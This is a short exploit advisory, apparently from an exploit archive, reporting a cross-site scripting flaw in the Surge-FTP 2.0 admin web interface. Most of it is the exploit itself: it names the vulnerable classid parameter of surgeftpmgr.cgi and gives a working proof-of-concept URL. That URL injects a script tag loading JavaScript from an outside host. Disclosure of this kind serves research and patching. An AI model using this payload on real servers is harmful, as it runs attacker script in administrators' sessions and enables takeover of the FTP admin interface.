Surge-FTP Admin Web interface XSS Vulnerability

Posted on 26 March 2010
===============================================
Surge-FTP Admin Web interface XSS Vulnerability
===============================================


# Exploit Title: Surge-FTP Admin Web interface XSS Vulnerability
# Date: 2010-01-09
# Author: FB1H2S
# Software Link:
#http://netwinsite.com/ftp/surgeftp/surgeftp_23a6_windows.exe
# Version: [2.0]
# Tested on: [wINDOWS]
# CVE : [if exists]
# Code : [exploit code]

<------------------- FB1H2S ------------------- >
#############################################################
# SURGE FTP ADMIN WEB Module XSS #
#############################################################
# Author : FB1H2S
# Home : whitec0de.com
# Bug Type : Xss
#
#
#############################################################
=======================C=y=b=e=r=_=9=4=5================
http://127.0.0.1:7021/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&classid=[xss
via src]



http://127.0.0.1:7021/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&classid=[xss
]

=======================FB1H2S===========================
*****
Poc *
*****



http://127.0.0.1:7021/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&classid=%3CS
CRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E


# Inj3ct0r.com [2010-03-26]
TOP
Malware :

None in database
Last 20
Exploits :

Last 20